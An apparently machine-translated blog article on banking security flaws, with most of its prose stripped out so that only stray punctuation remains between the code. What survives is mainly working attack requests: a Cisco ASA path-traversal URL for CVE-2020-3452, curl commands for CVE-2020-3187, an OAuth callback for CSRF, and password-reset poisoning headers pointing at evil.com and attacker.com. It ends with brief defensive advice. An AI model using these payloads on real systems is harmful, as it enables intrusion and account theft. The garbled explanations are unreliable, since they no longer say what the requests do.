Online banking security issues

Hello friends!





Today we will talk about the pressing security problems of banking systems, we will analyze common vulnerabilities and draw conclusions based on current problems.





Important

Again, the author does not guarantee to show you how to fully protect your system from cyber threats, only wants to show what problems you should pay your attention to.





1. SSL VPN Services

Banks very often use Cisco SSL VPN services to organize remote access to their internal network





, .. Cisco CVE-2020-3452 CVE-2020-3187





1.1. CVE-2020-3452

CVE-2020-3452 - Cisco ASA FTD. , , , HTTP- .









https://bank.com/+CSCOT+/translation-table?type=mst&textdomain=/%252bCSCOE%252b/portal_inc.lua&default-language&lang=../









, .





1.2. CVE-2020-3187





/session_password.html 200





curl -k -s -i https://



Cisco-VPN/+CSCOE+/session_password.html







200? -





"/+CSCOU+/csco_logo.gif"







curl -k -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://



Cisco-VPN/+CSCOE+/session_password.html







VPN .





2. & OAuth

- (SSO) OAuth 2.0, , , .





GET /auth/sso/cb?code=[sso token account] HTTP/1.1

Host: bank.com

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close









CSRF . - .





  1. SSO





  2. SSO ,





  3. .





  4. SSO .





redirect_uri - url . / .









POST https://bank.com/reset.php HTTP/1.1

Accept: /

Content-Type: application/json

Host: evil.com












Host: bank.com

X-Forwarded-Host: attacker.com












Host: target.com

Host: attacker.com








email .









https://evil.com/reset-password.php?token=12345678-1234-1234-1234-12345678901





- . , .





.





POST /resetPassword

[…]

email=victim@email.com&email=attacker@email.com








In the request, you can see that the attacker simply duplicated the email parameter and indicated his mail to which the authorization token will be sent.





Output

Keep your services up to date, whether it's SSL VPN or GlobalProtect.





Keep Authentication Secure





Also as a tip, use a Web Application Firewall (  WAF  ) to prevent exploitation of vulnerabilities caused by code changes.





Good luck! All the best.








All Articles